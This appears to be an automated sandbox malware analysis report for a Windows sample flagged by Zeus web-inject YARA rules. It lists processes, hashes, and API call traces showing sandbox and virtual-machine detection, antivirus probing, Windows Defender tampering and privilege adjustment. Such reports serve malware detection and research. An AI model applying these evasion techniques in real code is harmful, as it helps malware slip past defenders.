                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.2003048692.0000000002AA0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001C.00000002.1961721864.0000000002700000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                            Start time:12:08:22
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 780
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                            Start time:12:08:23
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.1989491611.00000000028D0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 0000001F.00000002.2028413256.0000000002AD0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                            Start time:12:08:24
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1812 -s 3712
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                            Start time:12:08:25
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2019868965.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.2034641560.0000000002AB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:38
                                                                                                                                                                                                            Start time:12:08:26
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 656
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            File size:483'680 bytes
                                                                                                                                                                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                            Target ID:39
                                                                                                                                                                                                            Start time:12:08:29
                                                                                                                                                                                                            Start date:11/11/2024
                                                                                                                                                                                                            Path:C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe
                                                                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                                                                            Commandline:"C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe"
                                                                                                                                                                                                            Imagebase:0x330000
                                                                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                            Yara matches:
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2056889554.0000000000E80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000027.00000002.2057701274.0000000000EE0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                            Has exited:true


                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                              Execution Coverage:1.1%
                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                              Signature Coverage:64%
                                                                                                                                                                                                              Total number of Nodes:253
                                                                                                                                                                                                              Total number of Limit Nodes:16

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                                • Part of subcall function 00403A20: RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                                • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                                • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                                • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                              • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                              • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                              • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                              • API String ID: 3353599405-1027215798
                                                                                                                                                                                                              • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD

                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph of the function at 00403A20]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98

                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph of the function at 004021D0]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                              • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                              • API String ID: 33631002-3172865025
                                                                                                                                                                                                              • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55

                                                                                                                                                                                                              Control-flow Graph

[Control-flow graph of the function at 00401150]
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$Handle$AllocateCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@

                                                                                                                                                                                                              Control-flow Graph (first block 401b20-401b35; graph not reproduced)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • EntryPoint.UAVINOSIQH(00000000), ref: 00401BB0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateEntryHandleHeaderImageLockModulePointPointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll

                                                                                                                                                                                                              Control-flow Graph (first block 4020e0-40213c; graph not reproduced)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@

                                                                                                                                                                                                              Control-flow Graph (first block 402680-4026ac; graph not reproduced)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.COMBASE ref: 004028BE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustCloseErrorHandleLastLookupPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1360762384.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1360762384.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_uavINoSIQh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
